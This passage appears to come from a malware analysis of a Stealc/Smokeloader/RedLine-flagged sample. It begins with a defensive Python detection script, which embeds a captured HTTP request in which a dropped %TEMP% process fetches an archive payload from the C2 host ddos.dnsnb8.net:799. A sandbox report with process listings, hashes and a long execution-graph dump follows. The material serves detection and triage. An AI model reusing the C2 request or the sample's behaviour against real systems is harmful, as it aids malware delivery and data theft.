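    {"src": "192.168.2.8", "sport": 49705, "dst": "44.221.84.105", "dport": 799,
     "pid": 7496, "process": r"C:\Users\user\AppData\Local\Temp\WuiXLS.exe"},
]

# Transcribed from the HTTP request shown above.
HTTP_REQUEST = (
    "GET /cj//k1.rar HTTP/1.1\r\n"
    "Accept: */*\r\n"
    "Accept-Encoding: gzip, deflate\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; "
    "Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; "
    ".NET CLR 3.5.30729)\r\n"
    "Host: ddos.dnsnb8.net:799\r\n"
    "Connection: Keep-Alive\r\n"
    "\r\n"
)

# Assumptions (tune per environment): ports where plain HTTP is expected, and
# the directory and extensions that make a download worth flagging.
EXPECTED_HTTP_PORTS = {80, 8080, 8000, 443, 8443}
TEMP_DIR_RE = re.compile(r"\\AppData\\Local\\Temp\\", re.IGNORECASE)
ARCHIVE_RE = re.compile(r"\.(rar|zip|7z|cab)$", re.IGNORECASE)


def parse_http_request(raw):
    """Split a raw HTTP/1.x request into its request line and lower-cased headers."""
    head, _, _ = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        key, _, value = line.partition(":")
        headers[key.strip().lower()] = value.strip()
    return {"method": method, "path": path, "version": version, "headers": headers}


def host_header_port(host):
    """'name:port' -> (name, port); a Host header without a port implies 80."""
    name, sep, port = host.rpartition(":")
    if sep and port.isdigit():
        return name, int(port)
    return host, 80


def dns_retransmits(queries):
    """Count repeated (txid, name) pairs: the client reused the same id on retry."""
    counts = Counter((txid, name) for _, txid, name in queries)
    return {name: n - 1 for (_, name), n in counts.items() if n > 1}


def indicators(dns_queries, dns_answers, sessions, raw_request):
    req = parse_http_request(raw_request)
    host, host_port = host_header_port(req["headers"].get("host", ""))
    resolved = {a["name"]: a["address"] for a in dns_answers}
    findings = []
    for name, n in dns_retransmits(dns_queries).items():
        findings.append(f"dns-retransmit:{name}x{n}")
    for s in sessions:
        if s["dport"] not in EXPECTED_HTTP_PORTS:
            findings.append(f"http-on-nonstandard-port:{s['dport']}")
        # DNS answer, TCP destination and Host header all agree: one C2 chain.
        if resolved.get(host) == s["dst"] and host_port == s["dport"]:
            findings.append(f"dns-to-c2-correlated:{host}->{s['dst']}:{s['dport']}")
        if TEMP_DIR_RE.search(s["process"]):
            findings.append(f"temp-process-network:pid={s['pid']}")
    if ARCHIVE_RE.search(req["path"]):
        findings.append(f"archive-download:{req['path']}")
    return findings


if __name__ == "__main__":
    for finding in indicators(DNS_QUERIES, DNS_ANSWERS, SESSIONS, HTTP_REQUEST):
        print(finding)
```

Run as a script it prints five findings for the records above. The correlation step is the one that matters for triage: a non-standard port alone is noisy, but a DNS answer whose address is then contacted on the exact port named in the Host header, by a process running from %TEMP%, is the pattern to write the rule around.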


                                        Target ID:0
                                        Start time:20:51:27
                                        Start date:25/07/2024
                                        Path:C:\Users\user\Desktop\7Y18r(193).exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\Desktop\7Y18r(193).exe"
                                        Imagebase:0x400000
                                        File size:217'088 bytes
                                        MD5 hash:3A085E2C496B3D2020401C3452B57AEF
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Stealc_2, Description: Yara detected Stealc, Source: 00000000.00000002.1511542856.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.1511542856.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                        • Rule: JoeSecurity_Stealc_2, Description: Yara detected Stealc, Source: 00000000.00000003.1457369500.0000000002430000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.1511687586.00000000008E2000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                        • Rule: JoeSecurity_Stealc_2, Description: Yara detected Stealc, Source: 00000000.00000002.1511164621.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                        Reputation:low
                                        Has exited:true

                                        Target ID:2
                                        Start time:20:51:27
                                        Start date:25/07/2024
                                        Path:C:\Users\user\AppData\Local\Temp\WuiXLS.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Users\user\AppData\Local\Temp\WuiXLS.exe
                                        Imagebase:0x700000
                                        File size:15'872 bytes
                                        MD5 hash:F7D21DE5C4E81341ECCD280C11DDCC9A
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Antivirus matches:
                                        • Detection: 100%, Avira
                                        • Detection: 100%, Joe Sandbox ML
                                        • Detection: 92%, ReversingLabs
                                        Reputation:moderate
                                        Has exited:true

                                        Target ID:6
                                        Start time:20:51:32
                                        Start date:25/07/2024
                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7496 -s 1488
                                        Imagebase:0x140000
                                        File size:483'680 bytes
                                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:9
                                        Start time:20:51:34
                                        Start date:25/07/2024
                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7472 -s 528
                                        Imagebase:0x140000
                                        File size:483'680 bytes
                                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true


                                          Execution Graph

                                          Execution Coverage:4.1%
                                          Dynamic/Decrypted Code Coverage:56.9%
                                          Signature Coverage:2.8%
                                          Total number of Nodes:2000
                                          Total number of Limit Nodes:15
                                          execution_graph (node dump of the interactive graph viewer; the call chains recoverable from it, by address):
                                          0x890001 -> 0x8908c7 (unpacker stub): GetPEB; SetErrorMode, SetErrorMode; GetPEB; VirtualAlloc; VirtualProtect; VirtualFree; LoadLibraryA
                                          0x8e55c6 -> 0x8e5a72: CreateToolhelp32Snapshot; Module32First; VirtualAlloc
                                          0x401130 -> 0x401164: GetProcessHeap, RtlAllocateHeap, GetComputerNameA; GetProcessHeap, RtlAllocateHeap, GetUserNameA; ExitProcess
                                          0x410430 -> 0x401f50: repeated calls into 0x403810 (malloc, malloc); then 0x412180: GetPEB; LoadLibraryA x5; GetProcAddress (several nodes, 0x4121ac: 21 API calls); 0x41302e lstrcpy; 0x401240 GetPEB; 0x410456 ExitProcess or continue at 0x41045e
                                          0x401170 (environment checks, each with an ExitProcess branch): GetSystemInfo; GetCurrentProcess, VirtualAllocExNuma; VirtualAlloc, VirtualFree; GlobalMemoryStatusEx, __aulldiv; GetUserDefaultLangID (five ExitProcess branches at 0x4101d2); GetUserDefaultLangID; GetProcessHeap, RtlAllocateHeap, GetUserNameA
                                          0x410494 -> 0x41055d: 0x413260 (lstrlen, lstrcpy, lstrcat, lstrcpy) x5; 0x413150 (lstrcpy); 0x410513 OpenEventA -> CloseHandle, Sleep (0x410546) or CreateEventA (0x410532)
                                          0x410360 -> 0x410420: GetSystemTime; 0x410260 (lstrcpy chains); sscanf; SystemTimeToFileTime, SystemTimeToFileTime; ExitProcess branch at 0x410418
                                          0x40f9a0 onward: lstrcpy/lstrlen/lstrcat chains; 0x402260 (another long 0x403810 malloc sequence); 0x4040c0 (GetProcessHeap, RtlAllocateHeap); 0x404a70 (25 API calls); subroutines 0x410590, 0x403990, 0x40bcb0, 0x401950, 0x40b5a0, 0x40b3f0, 0x40bee0, 0x40b130, 0x40b6c0, 0x401a10, 0x40b800
18400 402e19 18399->18400 18401 403810 2 API calls 18400->18401 18402 402e2b 18401->18402 18403 403810 2 API calls 18402->18403 18404 402e3d 18403->18404 18405 403810 2 API calls 18404->18405 18406 402e4f 18405->18406 18407 403810 2 API calls 18406->18407 18408 402e61 18407->18408 18409 403810 2 API calls 18408->18409 18410 402e73 18409->18410 18411 403810 2 API calls 18410->18411 18412 402e85 18411->18412 18413 403810 2 API calls 18412->18413 18414 402e97 18413->18414 18415 403810 2 API calls 18414->18415 18416 402ea9 18415->18416 18417 403810 2 API calls 18416->18417 18418 402ebb 18417->18418 18419 403810 2 API calls 18418->18419 18420 402ecd 18419->18420 18421 403810 2 API calls 18420->18421 18422 402edf 18421->18422 18423 403810 2 API calls 18422->18423 18424 402ef1 18423->18424 18425 403810 2 API calls 18424->18425 18426 402f03 18425->18426 18427 403810 2 API calls 18426->18427 18428 402f15 18427->18428 18429 403810 2 API calls 18428->18429 18430 402f27 18429->18430 18431 403810 2 API calls 18430->18431 18432 402f39 18431->18432 18433 403810 2 API calls 18432->18433 18434 402f4b 18433->18434 18435 403810 2 API calls 18434->18435 18436 402f5d 18435->18436 18437 403810 2 API calls 18436->18437 18438 402f6f 18437->18438 18439 403810 2 API calls 18438->18439 18440 402f81 18439->18440 18441 403810 2 API calls 18440->18441 18442 402f93 18441->18442 18443 403810 2 API calls 18442->18443 18444 402fa5 18443->18444 18445 403810 2 API calls 18444->18445 18446 402fb7 18445->18446 18447 403810 2 API calls 18446->18447 18448 402fc9 18447->18448 18449 403810 2 API calls 18448->18449 18450 402fdb 18449->18450 18451 403810 2 API calls 18450->18451 18452 402fed 18451->18452 18453 403810 2 API calls 18452->18453 18454 402fff 18453->18454 18455 403810 2 API calls 18454->18455 18456 403011 18455->18456 18457 403810 2 API calls 18456->18457 18458 403023 18457->18458 18459 403810 2 API calls 18458->18459 18460 403035 18459->18460 18461 403810 2 API calls 18460->18461 18462 403047 
18461->18462 18463 403810 2 API calls 18462->18463 18464 403059 18463->18464 18465 403810 2 API calls 18464->18465 18466 40306b 18465->18466 18467 403810 2 API calls 18466->18467 18468 40307d 18467->18468 18469 403810 2 API calls 18468->18469 18470 40308f 18469->18470 18471 403810 2 API calls 18470->18471 18472 4030a1 18471->18472 18473 403810 2 API calls 18472->18473 18474 4030b3 18473->18474 18475 403810 2 API calls 18474->18475 18476 4030c5 18475->18476 18477 403810 2 API calls 18476->18477 18478 4030d7 18477->18478 18479 403810 2 API calls 18478->18479 18480 4030e9 18479->18480 18481 403810 2 API calls 18480->18481 18482 4030fb 18481->18482 18483 403810 2 API calls 18482->18483 18484 40310d 18483->18484 18485 403810 2 API calls 18484->18485 18486 40311f 18485->18486 18487 403810 2 API calls 18486->18487 18488 403131 18487->18488 18489 403810 2 API calls 18488->18489 18490 403143 18489->18490 18491 403810 2 API calls 18490->18491 18492 403155 18491->18492 18493 403810 2 API calls 18492->18493 18494 403167 18493->18494 18495 403810 2 API calls 18494->18495 18496 403179 18495->18496 18497 403810 2 API calls 18496->18497 18498 40318b 18497->18498 18499 403810 2 API calls 18498->18499 18500 40319d 18499->18500 18501 403810 2 API calls 18500->18501 18502 4031af 18501->18502 18503 403810 2 API calls 18502->18503 18504 4031c1 18503->18504 18505 403810 2 API calls 18504->18505 18506 4031d3 18505->18506 18507 403810 2 API calls 18506->18507 18508 4031e5 18507->18508 18509 403810 2 API calls 18508->18509 18510 4031f7 18509->18510 18511 403810 2 API calls 18510->18511 18512 403209 18511->18512 18513 403810 2 API calls 18512->18513 18514 40321b 18513->18514 18515 403810 2 API calls 18514->18515 18516 40322d 18515->18516 18517 403810 2 API calls 18516->18517 18518 40323f 18517->18518 18519 403810 2 API calls 18518->18519 18520 403251 18519->18520 18521 403810 2 API calls 18520->18521 18522 403263 18521->18522 18523 403810 2 API calls 18522->18523 18524 403275 18523->18524 
18525 403810 2 API calls 18524->18525 18526 403287 18525->18526 18527 403810 2 API calls 18526->18527 18528 403299 18527->18528 18529 403810 2 API calls 18528->18529 18530 4032ab 18529->18530 18531 403810 2 API calls 18530->18531 18532 4032bd 18531->18532 18533 403810 2 API calls 18532->18533 18534 4032cf 18533->18534 18535 403810 2 API calls 18534->18535 18536 4032e1 18535->18536 18537 403810 2 API calls 18536->18537 18538 4032f3 18537->18538 18539 403810 2 API calls 18538->18539 18540 403305 18539->18540 18541 403810 2 API calls 18540->18541 18542 403317 18541->18542 18543 403810 2 API calls 18542->18543 18544 403329 18543->18544 18545 403810 2 API calls 18544->18545 18546 40333b 18545->18546 18547 403810 2 API calls 18546->18547 18548 40334d 18547->18548 18549 403810 2 API calls 18548->18549 18550 40335f 18549->18550 18551 403810 2 API calls 18550->18551 18552 403371 18551->18552 18553 403810 2 API calls 18552->18553 18554 403383 18553->18554 18555 403810 2 API calls 18554->18555 18556 403395 18555->18556 18557 403810 2 API calls 18556->18557 18558 4033a7 18557->18558 18559 403810 2 API calls 18558->18559 18560 4033b9 18559->18560 18561 403810 2 API calls 18560->18561 18562 4033cb 18561->18562 18563 403810 2 API calls 18562->18563 18564 4033dd 18563->18564 18565 403810 2 API calls 18564->18565 18566 4033ef 18565->18566 18567 403810 2 API calls 18566->18567 18568 403401 18567->18568 18569 403810 2 API calls 18568->18569 18570 403413 18569->18570 18571 403810 2 API calls 18570->18571 18572 403425 18571->18572 18573 403810 2 API calls 18572->18573 18574 403437 18573->18574 18575 403810 2 API calls 18574->18575 18576 403449 18575->18576 18577 403810 2 API calls 18576->18577 18578 40345b 18577->18578 18579 403810 2 API calls 18578->18579 18580 40346d 18579->18580 18581 403810 2 API calls 18580->18581 18582 40347f 18581->18582 18583 403810 2 API calls 18582->18583 18584 403491 18583->18584 18585 403810 2 API calls 18584->18585 18586 4034a3 18585->18586 18587 403810 2 
API calls 18586->18587 18588 4034b5 18587->18588 18589 403810 2 API calls 18588->18589 18590 4034c7 18589->18590 18591 403810 2 API calls 18590->18591 18592 4034d9 18591->18592 18593 403810 2 API calls 18592->18593 18594 4034eb 18593->18594 18595 403810 2 API calls 18594->18595 18596 4034fd 18595->18596 18597 403810 2 API calls 18596->18597 18598 40350f 18597->18598 18599 403810 2 API calls 18598->18599 18600 403521 18599->18600 18601 403810 2 API calls 18600->18601 18602 403533 18601->18602 18603 403810 2 API calls 18602->18603 18604 403545 18603->18604 18605 403810 2 API calls 18604->18605 18606 403557 18605->18606 18607 403810 2 API calls 18606->18607 18608 403569 18607->18608 18609 403810 2 API calls 18608->18609 18610 40357b 18609->18610 18611 403810 2 API calls 18610->18611 18612 40358d 18611->18612 18613 403810 2 API calls 18612->18613 18614 40359f 18613->18614 18615 403810 2 API calls 18614->18615 18616 4035b1 18615->18616 18617 403810 2 API calls 18616->18617 18618 4035c3 18617->18618 18619 403810 2 API calls 18618->18619 18620 4035d5 18619->18620 18621 403810 2 API calls 18620->18621 18622 4035e7 18621->18622 18623 403810 2 API calls 18622->18623 18624 4035f9 18623->18624 18625 403810 2 API calls 18624->18625 18626 40360b 18625->18626 18627 403810 2 API calls 18626->18627 18628 40361d 18627->18628 18629 403810 2 API calls 18628->18629 18630 40362f 18629->18630 18631 403810 2 API calls 18630->18631 18632 403641 18631->18632 18633 403810 2 API calls 18632->18633 18634 403653 18633->18634 18635 403810 2 API calls 18634->18635 18636 403665 18635->18636 18637 403810 2 API calls 18636->18637 18638 403677 18637->18638 18639 403810 2 API calls 18638->18639 18640 403689 18639->18640 18641 403810 2 API calls 18640->18641 18642 40369b 18641->18642 18643 403810 2 API calls 18642->18643 18644 4036ad 18643->18644 18645 403810 2 API calls 18644->18645 18646 4036bf 18645->18646 18647 403810 2 API calls 18646->18647 18648 4036d1 18647->18648 18649 403810 2 API calls 
18648->18649 18650 4036e3 18649->18650 18651 403810 2 API calls 18650->18651 18652 4036f5 18651->18652 18653 403810 2 API calls 18652->18653 18654 403707 18653->18654 18655 403810 2 API calls 18654->18655 18656 403719 18655->18656 18657 403810 2 API calls 18656->18657 18658 40372b 18657->18658 18659 403810 2 API calls 18658->18659 18660 40373d 18659->18660 18661 403810 2 API calls 18660->18661 18662 40374f 18661->18662 18663 403810 2 API calls 18662->18663 18664 403761 18663->18664 18665 403810 2 API calls 18664->18665 18666 403773 18665->18666 18667 403810 2 API calls 18666->18667 18668 403785 18667->18668 18669 403810 2 API calls 18668->18669 18670 403797 18669->18670 18671 403810 2 API calls 18670->18671 18672 4037a9 18671->18672 18673 403810 2 API calls 18672->18673 18674 4037bb 18673->18674 18675 403810 2 API calls 18674->18675 18676 4037cd 18675->18676 18677 403810 2 API calls 18676->18677 18678 4037df 18677->18678 18679 403810 2 API calls 18678->18679 18680 4037f1 18679->18680 18681 403810 2 API calls 18680->18681 18682 403803 18681->18682 18683 4124f0 18682->18683 18684 412500 43 API calls 18683->18684 18685 412916 8 API calls 18683->18685 18684->18685 18686 412a26 18685->18686 18687 4129ac GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 18685->18687 18688 412a33 8 API calls 18686->18688 18689 412af6 18686->18689 18687->18686 18688->18689 18690 412b78 18689->18690 18691 412aff GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 18689->18691 18692 412b85 6 API calls 18690->18692 18693 412c17 18690->18693 18691->18690 18692->18693 18694 412c24 9 API calls 18693->18694 18695 412cff 18693->18695 18694->18695 18696 412d82 18695->18696 18697 412d08 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 18695->18697 18698 412d8b GetProcAddress GetProcAddress 18696->18698 18699 412dbc 18696->18699 18697->18696 18698->18699 18700 412df5 18699->18700 18701 412dc5 GetProcAddress GetProcAddress 
18699->18701 18702 412e02 8 API calls 18700->18702 18703 412ec5 18700->18703 18701->18700 18702->18703 18704 412f2f 18703->18704 18705 412ece GetProcAddress GetProcAddress GetProcAddress GetProcAddress 18703->18705 18706 412f51 18704->18706 18707 412f38 GetProcAddress 18704->18707 18705->18704 18708 40fab6 18706->18708 18709 412f5a GetProcAddress GetProcAddress GetProcAddress GetProcAddress 18706->18709 18707->18706 18708->17898 18709->18708 18711 4105b5 18710->18711 18712 410669 GetProcessHeap RtlAllocateHeap 18711->18712 18713 410686 18712->18713 18715 410695 18712->18715 18714 412ff0 lstrcpy 18713->18714 18716 40fb84 18714->18716 18717 412ff0 lstrcpy 18715->18717 18716->17918 18717->18716 18719 413050 lstrcpy 18718->18719 18720 4039a9 18719->18720 19663 4038c0 18720->19663 18722 4039b5 18723 412ff0 lstrcpy 18722->18723 18724 4039e7 18723->18724 18725 412ff0 lstrcpy 18724->18725 18726 4039f4 18725->18726 18727 412ff0 lstrcpy 18726->18727 18728 403a01 18727->18728 18729 412ff0 lstrcpy 18728->18729 18730 403a0e 18729->18730 18731 412ff0 lstrcpy 18730->18731 18732 403a1b 18731->18732 18736 403f77 18732->18736 19673 4115d0 18732->19673 18734 403a73 19681 4131d0 18734->19681 19687 4061b0 CryptStringToBinaryA 18736->19687 18737 403a86 18738 413150 lstrcpy 18737->18738 18743 403a8f 18738->18743 18741 4130d0 2 API calls 18742 404015 18741->18742 18744 413260 4 API calls 18742->18744 18747 413260 4 API calls 18743->18747 18746 40402b 18744->18746 18745 404037 18750 413050 lstrcpy 18745->18750 18748 413150 lstrcpy 18746->18748 18749 403ab9 18747->18749 18748->18745 18751 413150 lstrcpy 18749->18751 18761 404067 18750->18761 18752 403ac2 18751->18752 18753 413260 4 API calls 18752->18753 18754 403ae1 18753->18754 18755 413150 lstrcpy 18754->18755 18756 403aea 18755->18756 18757 4131d0 3 API calls 18756->18757 18758 403b08 18757->18758 18759 413150 lstrcpy 18758->18759 18760 403b11 18759->18760 18762 413260 4 API calls 18760->18762 18761->17921 18763 403b30 18762->18763 
18764 413150 lstrcpy 18763->18764 18765 403b39 18764->18765 18766 413260 4 API calls 18765->18766 18767 403b58 18766->18767 18768 413150 lstrcpy 18767->18768 18769 403b61 18768->18769 18770 413260 4 API calls 18769->18770 18771 403b8d 18770->18771 18772 4131d0 3 API calls 18771->18772 18773 403b94 18772->18773 18774 413150 lstrcpy 18773->18774 18775 403b9d 18774->18775 18775->18736 18776 413260 4 API calls 18775->18776 18777 403c4c 18776->18777 18778 413150 lstrcpy 18777->18778 18779 403c55 18778->18779 18780 4131d0 3 API calls 18779->18780 18781 403c73 18780->18781 18782 413150 lstrcpy 18781->18782 18783 403c7c 18782->18783 18784 413260 4 API calls 18783->18784 18785 403c9b 18784->18785 18786 413150 lstrcpy 18785->18786 18787 403ca4 18786->18787 18788 413260 4 API calls 18787->18788 18789 403cc5 18788->18789 18790 413150 lstrcpy 18789->18790 18791 403cce 18790->18791 18792 413260 4 API calls 18791->18792 18793 403cee 18792->18793 18794 413150 lstrcpy 18793->18794 18795 403cf7 18794->18795 18796 413260 4 API calls 18795->18796 18797 403d16 18796->18797 18798 413150 lstrcpy 18797->18798 18799 403d1f 18798->18799 18800 4131d0 3 API calls 18799->18800 18801 403d3d 18800->18801 18802 413150 lstrcpy 18801->18802 18803 403d46 18802->18803 18804 413260 4 API calls 18803->18804 18805 403d65 18804->18805 18806 413150 lstrcpy 18805->18806 18807 403d6e 18806->18807 18808 413260 4 API calls 18807->18808 18809 403d8d 18808->18809 18810 413150 lstrcpy 18809->18810 18811 403d96 18810->18811 18812 4131d0 3 API calls 18811->18812 18813 403db4 18812->18813 18814 413150 lstrcpy 18813->18814 18815 403dbd 18814->18815 18816 413260 4 API calls 18815->18816 18817 403ddc 18816->18817 18818 413150 lstrcpy 18817->18818 18819 403de5 18818->18819 18820 413260 4 API calls 18819->18820 18821 403e06 18820->18821 18822 413150 lstrcpy 18821->18822 18823 403e0f 18822->18823 18824 413260 4 API calls 18823->18824 18825 403e2f 18824->18825 18826 413150 lstrcpy 18825->18826 18827 403e38 18826->18827 
18828 413260 4 API calls 18827->18828 18829 403e57 18828->18829 18830 413150 lstrcpy 18829->18830 18831 403e60 18830->18831 18832 4131d0 3 API calls 18831->18832 18833 403e7e 18832->18833 18834 413150 lstrcpy 18833->18834 18835 403e87 18834->18835 18836 412ff0 lstrcpy 18835->18836 18837 403ea2 18836->18837 18838 4131d0 3 API calls 18837->18838 18839 403ec3 18838->18839 18840 4131d0 3 API calls 18839->18840 18841 403eca 18840->18841 18842 413150 lstrcpy 18841->18842 18843 403ed6 18842->18843 18844 403ef7 lstrlen 18843->18844 18845 403f0a 18844->18845 18846 403f13 lstrlen 18845->18846 18847 403f23 18846->18847 18847->18736 18848 413260 4 API calls 18847->18848 18849 413150 lstrcpy 18847->18849 18848->18847 18849->18847 18851 40bcd4 18850->18851 18852 40bce7 18851->18852 18853 40bcdf ExitProcess 18851->18853 18854 40bcf7 strtok_s 18852->18854 18858 40bd04 18854->18858 18855 40be78 strtok_s 18855->18858 18856 40be9c 18856->17923 18857 4130d0 lstrlen lstrcpy 18857->18858 18858->18855 18858->18856 18858->18857 18860 413050 lstrcpy 18859->18860 18861 401963 18860->18861 18862 413050 lstrcpy 18861->18862 18863 401975 18862->18863 18864 413050 lstrcpy 18863->18864 18865 401987 18864->18865 18866 413050 lstrcpy 18865->18866 18867 401999 18866->18867 18868 404a70 18867->18868 18869 413050 lstrcpy 18868->18869 18870 404a89 18869->18870 18871 4038c0 2 API calls 18870->18871 18872 404a95 18871->18872 18873 412ff0 lstrcpy 18872->18873 18874 404aca 18873->18874 18875 412ff0 lstrcpy 18874->18875 18876 404ad7 18875->18876 18877 412ff0 lstrcpy 18876->18877 18878 404ae4 18877->18878 18879 412ff0 lstrcpy 18878->18879 18880 404af1 18879->18880 18881 412ff0 lstrcpy 18880->18881 18882 404afe 18881->18882 18883 4115d0 3 API calls 18882->18883 18885 405077 18882->18885 18884 404b4c 18883->18884 18886 4131d0 3 API calls 18884->18886 18889 4061b0 2 API calls 18885->18889 18887 404b5f 18886->18887 18888 413150 lstrcpy 18887->18888 18893 404b68 18888->18893 18890 4050f3 18889->18890 18891 
4130d0 2 API calls 18890->18891 18895 40512c 18890->18895 18892 40510a 18891->18892 18894 413260 4 API calls 18892->18894 18897 413260 4 API calls 18893->18897 18896 405120 18894->18896 18900 413050 lstrcpy 18895->18900 18898 413150 lstrcpy 18896->18898 18899 404b92 18897->18899 18898->18895 18901 413150 lstrcpy 18899->18901 18910 40515c 18900->18910 18902 404b9b 18901->18902 18903 413260 4 API calls 18902->18903 18904 404bba 18903->18904 18905 413150 lstrcpy 18904->18905 18906 404bc3 18905->18906 18907 4131d0 3 API calls 18906->18907 18908 404be1 18907->18908 18909 413150 lstrcpy 18908->18909 18911 404bea 18909->18911 18910->17929 18912 413260 4 API calls 18911->18912 18913 404c09 18912->18913 18914 413150 lstrcpy 18913->18914 18915 404c12 18914->18915 18916 413260 4 API calls 18915->18916 18917 404c31 18916->18917 18918 413150 lstrcpy 18917->18918 18919 404c3a 18918->18919 18920 413260 4 API calls 18919->18920 18921 404c66 18920->18921 18922 4131d0 3 API calls 18921->18922 18923 404c6d 18922->18923 18924 413150 lstrcpy 18923->18924 18925 404c76 18924->18925 18925->18885 18926 413260 4 API calls 18925->18926 18927 404d2f 18926->18927 18928 413150 lstrcpy 18927->18928 18929 404d38 18928->18929 18930 4131d0 3 API calls 18929->18930 18931 404d56 18930->18931 18932 413150 lstrcpy 18931->18932 18933 404d5f 18932->18933 18934 413260 4 API calls 18933->18934 18935 404d7e 18934->18935 18936 413150 lstrcpy 18935->18936 18937 404d87 18936->18937 18938 413260 4 API calls 18937->18938 18939 404da8 18938->18939 18940 413150 lstrcpy 18939->18940 18941 404db1 18940->18941 18942 413260 4 API calls 18941->18942 18943 404dd1 18942->18943 18944 413150 lstrcpy 18943->18944 18945 404dda 18944->18945 18946 413260 4 API calls 18945->18946 18947 404df9 18946->18947 18948 413150 lstrcpy 18947->18948 18949 404e02 18948->18949 18950 4131d0 3 API calls 18949->18950 18951 404e20 18950->18951 18952 413150 lstrcpy 18951->18952 18953 404e29 18952->18953 18954 413260 4 API calls 18953->18954 
18955 404e48 18954->18955 18956 413150 lstrcpy 18955->18956 18957 404e51 18956->18957 18958 413260 4 API calls 18957->18958 18959 404e70 18958->18959 18960 413150 lstrcpy 18959->18960 18961 404e79 18960->18961 18962 4131d0 3 API calls 18961->18962 18963 404e97 18962->18963 18964 413150 lstrcpy 18963->18964 18965 404ea0 18964->18965 18966 413260 4 API calls 18965->18966 18967 404ebf 18966->18967 18968 413150 lstrcpy 18967->18968 18969 404ec8 18968->18969 18970 413260 4 API calls 18969->18970 18971 404ee9 18970->18971 18972 413150 lstrcpy 18971->18972 18973 404ef2 18972->18973 18974 413260 4 API calls 18973->18974 18975 404f12 18974->18975 18976 413150 lstrcpy 18975->18976 18977 404f1b 18976->18977 18978 413260 4 API calls 18977->18978 18979 404f3a 18978->18979 18980 413150 lstrcpy 18979->18980 18981 404f43 18980->18981 18982 4131d0 3 API calls 18981->18982 18983 404f61 18982->18983 18984 413150 lstrcpy 18983->18984 18985 404f6a 18984->18985 18986 404f7d lstrlen 18985->18986 19694 413380 18986->19694 18988 404f8e lstrlen GetProcessHeap RtlAllocateHeap 19695 413380 18988->19695 18990 404fbb lstrlen 19696 413380 18990->19696 18992 404fcb memcpy 19697 413380 18992->19697 18994 404fe4 lstrlen 18995 404ff4 18994->18995 18996 404ffd lstrlen memcpy 18995->18996 19698 413380 18996->19698 18998 405027 lstrlen 18999 405037 18998->18999 18999->18885 19000 413260 4 API calls 18999->19000 19001 413150 lstrcpy 18999->19001 19000->18999 19001->18999 19699 413380 19002->19699 19004 40b5c7 strtok_s 19007 40b5d4 19004->19007 19005 40b6a1 19005->17931 19006 40b67d strtok_s 19006->19007 19007->19005 19007->19006 19008 4130d0 lstrlen lstrcpy 19007->19008 19008->19007 19700 413380 19009->19700 19011 40b417 strtok_s 19015 40b424 19011->19015 19012 40b577 19012->17939 19013 40b553 strtok_s 19013->19015 19014 4130d0 lstrlen lstrcpy 19014->19015 19015->19012 19015->19013 19015->19014 19017 412ff0 lstrcpy 19016->19017 19018 40bef6 19017->19018 19019 413260 4 API calls 19018->19019 19020 40bf07 
19019->19020 19021 413150 lstrcpy 19020->19021 19022 40bf10 19021->19022 19023 413260 4 API calls 19022->19023 19024 40bf2b 19023->19024 19025 413150 lstrcpy 19024->19025 19026 40bf34 19025->19026 19027 413260 4 API calls 19026->19027 19028 40bf4d 19027->19028 19029 413150 lstrcpy 19028->19029 19030 40bf56 19029->19030 19031 413260 4 API calls 19030->19031 19032 40bf71 19031->19032 19033 413150 lstrcpy 19032->19033 19034 40bf7a 19033->19034 19035 413260 4 API calls 19034->19035 19036 40bf93 19035->19036 19037 413150 lstrcpy 19036->19037 19038 40bf9c 19037->19038 19039 413260 4 API calls 19038->19039 19040 40bfb7 19039->19040 19041 413150 lstrcpy 19040->19041 19042 40bfc0 19041->19042 19043 413260 4 API calls 19042->19043 19044 40bfd9 19043->19044 19045 413150 lstrcpy 19044->19045 19046 40bfe2 19045->19046 19047 413260 4 API calls 19046->19047 19048 40bffd 19047->19048 19049 413150 lstrcpy 19048->19049 19050 40c006 19049->19050 19051 413260 4 API calls 19050->19051 19052 40c01f 19051->19052 19053 413150 lstrcpy 19052->19053 19054 40c028 19053->19054 19055 413260 4 API calls 19054->19055 19056 40c046 19055->19056 19057 413150 lstrcpy 19056->19057 19058 40c04f 19057->19058 19059 410590 3 API calls 19058->19059 19060 40c066 19059->19060 19061 4131d0 3 API calls 19060->19061 19062 40c079 19061->19062 19063 413150 lstrcpy 19062->19063 19064 40c082 19063->19064 19065 413260 4 API calls 19064->19065 19066 40c0ac 19065->19066 19067 413150 lstrcpy 19066->19067 19068 40c0b5 19067->19068 19069 413260 4 API calls 19068->19069 19070 40c0d5 19069->19070 19071 413150 